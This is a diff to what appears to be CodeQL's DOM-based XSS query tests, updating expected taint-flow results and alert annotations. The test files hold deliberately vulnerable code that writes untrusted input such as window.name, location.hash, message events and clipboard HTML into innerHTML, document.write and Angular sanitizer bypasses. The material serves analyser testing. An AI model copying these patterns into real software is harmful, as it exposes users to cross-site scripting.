tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | +| tst.js:498:7:498:26 | source | tst.js:499:27:499:32 | source | provenance | | +| tst.js:498:16:498:26 | window.name | tst.js:498:7:498:26 | source | provenance | | +| tst.js:499:27:499:32 | source | tst.js:499:18:499:33 | unescape(source) | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | | typeahead.js:24:30:24:32 | val | typeahead.js:25:18:25:20 | val | provenance | | +| v-html.vue:6:42:6:58 | document.location | v-html.vue:2:8:2:23 | v-html=tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:4:14:4:20 | tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:5:12:5:18 | tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:6:19:6:25 | tainted | provenance | | @@ -1248,22 +1300,36 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | #select +| hana.js:11:37:11:51 | rows[0].comment | hana.js:11:37:11:40 | rows | hana.js:11:37:11:51 | rows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:11:37:11:40 | rows | user-provided value | +| hana.js:16:37:16:51 | rows[0].comment | hana.js:16:37:16:40 | rows | hana.js:16:37:16:51 | rows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:16:37:16:40 | rows | user-provided value | +| hana.js:19:37:19:51 | rows[0].comment | hana.js:19:37:19:40 | rows | hana.js:19:37:19:51 | rows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:19:37:19:40 | rows | user-provided value | +| hana.js:22:37:22:49 | rs[0].comment | hana.js:22:37:22:38 | rs | hana.js:22:37:22:49 | rs[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:22:37:22:38 | rs | user-provided value | +| hana.js:38:31:38:43 | rs[0].comment | hana.js:38:31:38:32 | rs | hana.js:38:31:38:43 | rs[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:38:31:38:32 | rs | user-provided value | +| hana.js:43:33:43:52 | dummyRows[0].comment | hana.js:43:33:43:41 | dummyRows | hana.js:43:33:43:52 | dummyRows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:43:33:43:41 | dummyRows | user-provided value | +| hana.js:44:33:44:53 | tablesR ... comment | hana.js:44:33:44:42 | tablesRows | hana.js:44:33:44:53 | tablesR ... comment | Cross-site scripting vulnerability due to $@. | hana.js:44:33:44:42 | tablesRows | user-provided value | +| hana.js:50:33:50:52 | dummyRows[0].comment | hana.js:50:33:50:41 | dummyRows | hana.js:50:33:50:52 | dummyRows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:50:33:50:41 | dummyRows | user-provided value | +| hana.js:51:33:51:53 | tablesR ... comment | hana.js:51:33:51:42 | tablesRows | hana.js:51:33:51:53 | tablesR ... comment | Cross-site scripting vulnerability due to $@. | hana.js:51:33:51:42 | tablesRows | user-provided value | +| hana.js:70:33:70:47 | rows[0].comment | hana.js:70:33:70:36 | rows | hana.js:70:33:70:47 | rows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:70:33:70:36 | rows | user-provided value | +| hana.js:73:33:73:47 | rows[0].comment | hana.js:73:33:73:36 | rows | hana.js:73:33:73:47 | rows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:73:33:73:36 | rows | user-provided value | +| hana.js:84:35:84:54 | dummyRows[0].comment | hana.js:84:35:84:43 | dummyRows | hana.js:84:35:84:54 | dummyRows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:84:35:84:43 | dummyRows | user-provided value | +| hana.js:85:35:85:54 | tableRows[0].comment | hana.js:85:35:85:43 | tableRows | hana.js:85:35:85:54 | tableRows[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:85:35:85:43 | tableRows | user-provided value | +| hana.js:90:33:90:45 | rs[0].comment | hana.js:90:33:90:34 | rs | hana.js:90:33:90:45 | rs[0].comment | Cross-site scripting vulnerability due to $@. | hana.js:90:33:90:34 | rs | user-provided value | | jwt.js:6:14:6:20 | decoded | jwt.js:4:36:4:39 | data | jwt.js:6:14:6:20 | decoded | Cross-site scripting vulnerability due to $@. | jwt.js:4:36:4:39 | data | user-provided value | | typeahead.js:10:16:10:18 | loc | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | Cross-site scripting vulnerability due to $@. | typeahead.js:9:28:9:30 | loc | user-provided value | | xmlRequest.js:9:28:9:39 | json.message | xmlRequest.js:8:31:8:46 | xhr.responseText | xmlRequest.js:9:28:9:39 | json.message | Cross-site scripting vulnerability due to $@. | xmlRequest.js:8:31:8:46 | xhr.responseText | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ -this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK +this.addEventListener('message', function(event) { // $ Source + document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { - document.write(data); // NOT OK +this.addEventListener('message', function({data}) { // $ Source + document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + function foo(x, event, y) { // $ Source + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -1,15 +1,15 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts @@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -5,14 +5,14 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + const html = dataTransfer.getData('text/html'); // $ Source + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,22 +1,22 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..20e71516a9f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,19 +6,19 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; @@ -27,36 +27,36 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ 